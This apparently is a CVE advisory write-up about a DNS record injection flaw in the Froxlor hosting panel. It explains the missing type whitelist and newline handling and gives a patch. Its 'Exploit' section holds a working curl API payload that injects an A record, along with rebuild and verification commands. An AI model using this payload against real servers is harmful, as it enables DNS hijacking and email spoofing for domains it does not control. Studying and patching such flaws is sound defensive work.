Listen to this Post
The vulnerability exists because DomainZones::add() lacks a whitelist for DNS record types. The ‘type’ parameter from user input is accepted directly without validation against allowed values. An if/elseif chain validates content only for 13 known types (A, AAAA, CAA, CNAME, DNAME, LOC, MX, NS, RP, SRV, SSHFP, TLSA, TXT). Any other type (e.g., NAPTR, PTR, HINFO) bypasses all content validation. Additionally, the content field only receives trim(), which strips leading/trailing whitespace but preserves embedded newline characters. The AntiXSS filter does not strip newlines. The web UI type dropdown is client-side only. When an attacker submits an unsupported type with newlines in content, the data is stored in the database. Later, DnsEntry::__toString() concatenates content directly into zone file format without escaping newlines. Bind.php writes this zone file to disk. BIND parses each newline-separated line as an independent resource record or directive. This allows injection of arbitrary DNS records (A, TXT, etc.) and BIND directives like $INCLUDE, $ORIGIN, $GENERATE. An authenticated customer with DNS editing can execute this attack via API call.
dailycve form:
Platform: Froxlor
Version: Unspecified (2.x)
Vulnerability: DNS injection
Severity: Critical
date: 2024 (disclosed)
Prediction: Patch within 30d
What Undercode Say:
Analytics:
Count vulnerable endpoints grep -r "DomainZones::add" /var/www/froxlor/lib/Froxlor/Api/Commands/ Check type whitelist absence awk '/getParam.type/,/if/' lib/Froxlor/Api/Commands/DomainZones.php Simulate newline injection echo -e "type=NAPTR\ncontent=test\n@ IN A 1.2.3.4" | curl -X POST ...
Exploit:
Inject A record via newline
curl -s -X POST 'https://target/api.php' -u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{"command":"DomainZones.add","params":{"id":1,"type":"NAPTR","content":"100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4"}}'
Trigger DNS rebuild
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
Verify injection
dig @target example.com A +short
Protection from this CVE:
// Add type whitelist in DomainZones.php:93
$allowed_types = ['A','AAAA','CAA','CNAME','DNAME','LOC','MX','NS','RP','SRV','SSHFP','TLSA','TXT'];
if (!in_array($type, $allowed_types)) throw new Exception("Unsupported type", 406);
// Strip newlines in content (line 154)
$content = trim(str_replace(["\r","\n"], '', $content));
// Also sanitize in DnsEntry::__toString()
$_content = str_replace(["\r","\n"], '', $this->content);
Impact: Authenticated customer can redirect domain traffic (inject A/AAAA), override email security (SPF/DKIM/DMARC via TXT), inject BIND directives ($INCLUDE, $GENERATE) to read local files or mass-generate records, or cause DNS service disruption by malformed zone files. In multi-tenant hosting, one customer compromises DNS for their domain and potentially affects server stability.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
